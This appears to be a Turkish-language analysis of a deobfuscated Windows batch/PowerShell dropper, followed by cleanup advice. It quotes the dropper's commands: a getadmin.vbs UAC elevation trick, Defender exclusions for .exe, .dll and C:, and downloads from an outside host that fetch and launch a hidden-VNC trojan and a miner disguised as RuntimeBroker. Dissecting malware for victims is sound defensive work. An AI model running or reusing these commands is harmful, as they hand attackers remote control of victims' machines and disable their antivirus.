💣 Çözülen Zararlı Kodun İşlevleri:
1. Yönetici Yetkisi Alma
Kod, getadmin.vbs kullanarak UAC penceresi çıkarıyor ve yönetici izni alıyor:
echo Set UAC = CreateObject("Shell.Application") > "%temp%getadmin.vbs"
echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params", "", "runas", 1 >> ...
2. Antivirüs Bypass (Windows Defender Dışlama Ekleme)
Kod, sistemin Defender'ına *.exe, *.dll dosyalarını ve C: dizinini dışlama olarak ekliyor:
Add-MpPreference -ExclusionExtension '.exe'
Add-MpPreference -ExclusionExtension '.dll'
Add-MpPreference -ExclusionPath 'C:'

Bu, zararlının antivirüs tarafından görünmemesini sağlar.

3. Zararlı Dosya İndirme ve Çalıştırma
İki adet dosya indiriliyor:
DownloadFile('https://kleinanzeigen.ru/hvnc.exe', '%TEMP%RuntimeBroker.exe')
DownloadFile('https://kleinanzeigen.ru/miner.exe', '%TEMP%RuntimeBroker2.exe')
Ve ardından arka planda başlatılıyor:
start "" "%temp%RuntimeBroker.exe"
start "" "%temp%RuntimeBroker2.exe"
  • hvnc.exe: Muhtemelen Hidden VNC yani gizli masaüstü kontrol trojanı
  • miner.exe: %99 ihtimalle kripto para madencisi (cryptominer)
4. Kendini Temizliyor (İz silme)
del /q "%appdata%Microsoftrunpython.py"
Bu da kodun ilk tetiklendiği script dosyasını siliyor.
5. Sürekli Tekrar Deneme ve Explorer'ı Dondurma
Eğer hedef klasör (C:WindowsWinEmptyfold) yoksa:
  • explorer.exe kapatılıyor
  • zararlı tekrar tekrar çalıştırılıyor
  • sonunda explorer geri yükleniyor
Bu davranış, kullanıcının müdahale etmesini zorlaştırmak için yapılmış.
🚨 Sonuç:
Bu kod:
  • Yönetici izni alıyor
  • Windows Defender’ı etkisiz hale getiriyor
  • İnternetten zararlı dosyalar indirip çalıştırıyor
  • Kendini gizliyor ve izleri siliyor
  • Sürekli arka planda kendini tekrar çalıştırıyor
Bu açıkça bir Remote Access Trojan (RAT) + Crypto Miner kombinasyonudur.
🔧 Ne Yapmalısın?
Eğer çalıştırılmışsa:
  1. İnterneti kes
  2. C:WindowsWinEmptyfold, %APPDATA%Microsoft, %TEMP% klasörlerini tara ve temizle
  3. Autoruns ile sistem başlangıçlarını kontrol et
  4. Malwarebytes AdwCleaner veya benzeriyle tam sistem taraması yap
  5. Gerekirse sistemi temiz bir ISO ile sıfırla